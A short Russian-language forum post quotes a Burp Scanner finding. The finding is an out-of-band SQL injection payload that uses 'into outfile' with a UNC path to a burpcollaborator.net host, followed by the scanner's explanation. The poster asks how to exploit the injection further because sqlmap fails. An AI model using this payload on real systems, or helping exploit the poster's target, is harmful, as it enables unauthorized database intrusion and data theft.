
24.12.2019, 09:05
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n parameter appears to be vulnerable to SQL injection attacks. The payload into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
|
|
|